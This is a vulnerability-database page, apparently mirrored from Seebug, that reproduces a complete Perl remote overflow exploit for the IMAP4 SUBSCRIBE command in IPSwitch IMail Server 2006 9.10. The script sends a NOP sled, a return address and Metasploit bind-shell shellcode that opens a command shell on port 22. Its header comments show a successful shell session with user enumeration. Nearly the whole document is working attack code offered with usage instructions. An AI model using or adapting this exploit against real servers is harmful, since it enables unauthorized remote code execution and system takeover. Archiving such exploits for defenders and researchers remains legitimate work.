Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

IPSwitch IMail Server 2006 9.10 SUBSCRIBE Remote Overflow Exploit

🗓️ 28 Jul 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 10 Views

IPSwitch IMail Server 2006 9.10 SUBSCRIBE Remote Overflow Exploit. This script is a demonstration of a remote overflow exploit for the IMail Server 2006 version 9.10. It uses a crafted payload to target the IMAP4 service, potentially allowing unauthorized access to the system

Code

                                                #!/use/bin/perl

# Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1
# Code by yunshu, our team: www.ph4nt0m.org  Mail list: http://list.ph4nt0m.org

#F:>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass
#* OK IMAP4 Server (IMail 9.10)
#0 OK LOGIN completed
#* FLAGS (Answered Flagged Deleted Seen Draft)
#* 0 EXISTS
#* 0 RECENT
#* OK [UIDVALIDITY 1185270594] UIDs valid
#* OK [UIDNEXT 485270595] Predicted next UID
#2 OK [READ-WRITE] SELECT completed
#3 OK SUBSCRIBE completed
#Trying..
#Bingle!Maybe get it!
#You can try to telnet 22 port, do you have nc?


#D:Microsoft Visual Studio 8VC>nc -vv 192.168.1.2 22
#192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA
#(UNKNOWN) [192.168.1.2] 22 (?) open
#Microsoft Windows [.. 5.2.3790]
#(C) .... 1985-2003 Microsoft Corp.

#C:WINDOWSsystem32>net user
#net user

#\ .....

#-------------------------------------------------------------------------------
#Administrator            ASPNET                   Guest
#IUSR_WIN2K3              IWAM_WIN2K3              SUPPORT_388945a0
#..................


#C:WINDOWSsystem32>


use strict;
use warnings;
use IO::Socket;

if( @ARGV != 3 )
{
	my $banner = qq{
Imail subscribe exploit, Test on Imail 2006(9.10),windows 2003 Chinese SP1
You must have a account to login the imap server, good luck!
Code by yunshu, our team www.ph4nt0m.org, enjoin this exp~~
					 
imail_subscribe.pl  <host>   <username>   <password>
};

	print $banner."
";
	
	exit( -1 );
}

my $host = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];

# win32_bind -  EXITFUNC=thread LPORT=22 Size=344 Encoder=Pex http://metasploit.com
my $shellcode =
"x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x41".
"xd1xfdxbcx83xebxfcxe2xf4xbdxbbx16xf1xa9x28x02x43".
"xbexb1x76xd0x65xf5x76xf9x7dx5ax81xb9x39xd0x12x37".
"x0exc9x76xe3x61xd0x16xf5xcaxe5x76xbdxafxe0x3dx25".
"xedx55x3dxc8x46x10x37xb1x40x13x16x48x7ax85xd9x94".
"x34x34x76xe3x65xd0x16xdaxcaxddxb6x37x1excdxfcx57".
"x42xfdx76x35x2dxf5xe1xddx82xe0x26xd8xcax92xcdx37".
"x01xddx76xccx5dx7cx76xfcx49x8fx95x32x0fxdfx11xec".
"xbex07x9bxefx27xb9xcex8ex29xa6x8ex8ex1ex85x02x6c".
"x29x1ax10x40x7ax81x02x6ax1ex58x18xdaxc0x3cxf5xbe".
"x14xbbxffx43x91xb9x24xb5xb4x7cxaax43x97x82xaexef".
"x12x82xbexefx02x82x02x6cx27xb9xfdxaax27x82x74x5d".
"xd4xb9x59xa6x31x16xaax43x97xbbxedxedx14x2ex2dxd4".
"xe5x7cxd3x55x16x2ex2bxefx14x2ex2dxd4xa4x98x7bxf5".
"x16x2ex2bxecx15x85xa8x43x91x42x95x5bx38x17x84xeb".
"xbex07xa8x43x91xb7x97xd8x27xb9x9exd1xc8x34x97xec".
"x18xf8x31x35xa6xbbxb9x35xa3xe0x3dx4fxebx2fxbfx91".
"xbfx93xd1x2fxccxabxc5x17xeax7ax95xcexbfx62xebx43".
"x34x95x02x6ax1ax86xafxedx10x80x97xbdx10x80xa8xed".
"xbex01x95x11x98xd4x33xefxbex07x97x43xbexe6x02x6c".
"xcax86x01x3fx85xb5x02x6ax13x2ex2dxd4xaex1fx1dxdc".
"x12x2ex2bx43x91xd1xfdxbc";

my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>"143", proto=>"tcp" ) || die "Connect error.
";

my $res = <$sock>;
print $res;
if( $res !~ /OK/ )
{
	exit( -1 );
}

my $opcode = "x60x1Ax9Cx76";
#my $opcode = "x61x62x63x64";

my $num = 264991;

my $nop = "#IMAILPUB" . "x90" x ( $num - length($shellcode) ).$shellcode."x90x90xebx06".$opcode."x90x90x90x90"."xE9x44xfdxffxff"."x90" x 400;

# login
print $sock "0 LOGIN $user $pass
";
$res = <$sock>;
if( ! defined($res) )
{
	exit(-1);
}

print $res;
if( $res !~ /OK/ )
{
	exit(-1);
}

print $sock "2 SELECT INBOX
";
while( <$sock> )
{
	print $_;
	if( $_ =~ /2 OK/ || $_ =~ /2 BAD/ )
	{
		last;
	}
}

print $sock "3 SUBSCRIBE "$nop"
";
$res = <$sock>;
if( ! defined($res) )
{
	exit(-1);
}
print $res;

print "Trying..
";

sleep( 15 );
print "Bingle! Maybe get it!
You can try to telnet 22 port, do you have nc?
";

print $sock "4 LOGOUT
";
print <$sock>;

$sock->close();

# sebug.net

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Jul 2007 00:00Current
7.1High risk
Vulners AI Score7.1
ipswitch imail server 2006remote overflow exploitimap4security vulnerabilityremote accessexploitationpayload craftingunauthorized access
10